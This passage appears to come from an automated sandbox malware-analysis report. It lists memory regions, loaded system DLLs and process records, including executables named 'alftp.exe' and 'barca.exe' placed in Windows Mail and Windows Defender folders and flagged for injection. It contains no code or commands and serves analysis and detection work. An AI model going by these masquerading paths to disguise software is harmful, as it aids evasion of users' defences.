"pagefile_0x0000000000ff0000" filename = "" Region: id = 2745 start_va = 0x23f0000 end_va = 0x2db3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023f0000" filename = "" Region: id = 2746 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2747 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2748 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2749 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2750 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2751 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2752 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2753 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2754 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2755 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2756 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2757 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2758 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2759 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2760 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2761 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2762 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2763 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2764 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2765 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 2766 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 2767 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2768 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2769 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2770 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2771 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2772 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2773 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2774 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2775 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2776 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2777 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2779 start_va = 0xa80000 end_va = 0xc26fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Thread: id = 164 os_tid = 0xbd0 Process: id = "14" image_name = "alftp.exe" filename = "c:\\program files\\windows mail\\alftp.exe" page_root = "0x4eeb4000" os_pid = "0xbd4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\Windows Mail\\alftp.exe\" " cur_dir = "C:\\Program Files\\Windows Mail\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2780 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2781 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2782 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2783 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2784 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2785 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2786 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2787 start_va = 0xf0000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2788 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2789 start_va = 0x1e0000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2790 start_va = 0x220000 end_va = 0x2fefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 2791 start_va = 0x310000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 2792 start_va = 0x490000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2793 start_va = 0x590000 end_va = 0x717fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2794 start_va = 0x720000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 2795 start_va = 0x990000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 2796 start_va = 0xbd0000 end_va = 0xbe6fff monitored = 0 entry_point = 0xbd14a1 region_type = mapped_file name = "alftp.exe" filename = "\\Program Files\\Windows Mail\\alftp.exe" (normalized: "c:\\program files\\windows mail\\alftp.exe") Region: id = 2797 start_va = 0xbf0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 2798 start_va = 0x1ff0000 end_va = 0x29b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ff0000" filename = "" Region: id = 2799 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2800 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2801 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2802 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2803 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2804 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2805 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2806 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2807 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2808 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2809 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2810 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2811 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2812 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2813 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2814 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2815 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2816 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2817 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2818 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 2819 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 2820 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2821 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2822 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2823 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2824 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2825 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2826 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2827 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2828 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2829 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2830 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2832 start_va = 0x9d0000 end_va = 0xb09fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Thread: id = 165 os_tid = 0xbd8 Process: id = "15" image_name = "barca.exe" filename = "c:\\program files\\windows defender\\barca.exe" page_root = "0x4faba000" os_pid = "0xbdc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\Windows Defender\\barca.exe\" " cur_dir = "C:\\Program Files\\Windows Defender\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2833 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2834 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2835 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2836 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2837 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2838 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2839 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2840 start_va = 0x160000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2841 start_va = 0x200000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2842 start_va = 0x2d0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 2843 start_va = 0x3d0000 end_va = 0x4aefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 2844 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2845 start_va = 0x4c0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2846 start_va = 0x5c0000 end_va = 0x747fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2847 start_va = 0x750000 end_va = 0x8d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 2848 start_va = 0xac0000 end_va = 0xafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 2849 start_va = 0xfd0000 end_va = 0xfe6fff monitored = 0 entry_point = 0xfd14a1 region_type = mapped_file name = "barca.exe" filename = "\\Program Files\\Windows Defender\\barca.exe" (normalized: "c:\\program files\\windows defender\\barca.exe") Region: id = 2850 start_va = 0xff0000 end_va = 0x23effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ff0000" filename = "" Region: id = 2851 start_va = 0x23f0000 end_va = 0x2db3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023f0000" filename = "" Region: id = 2852 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2853 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2854 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2855 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2856 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2857 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2858 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2859 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2860 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2861 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2862 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2863 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2864 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2865 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2866 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2867 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2868 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2869 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2870 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2871 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 2872 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 2873 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2874 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2875 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2876 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2877 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2878 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2879 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2880 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 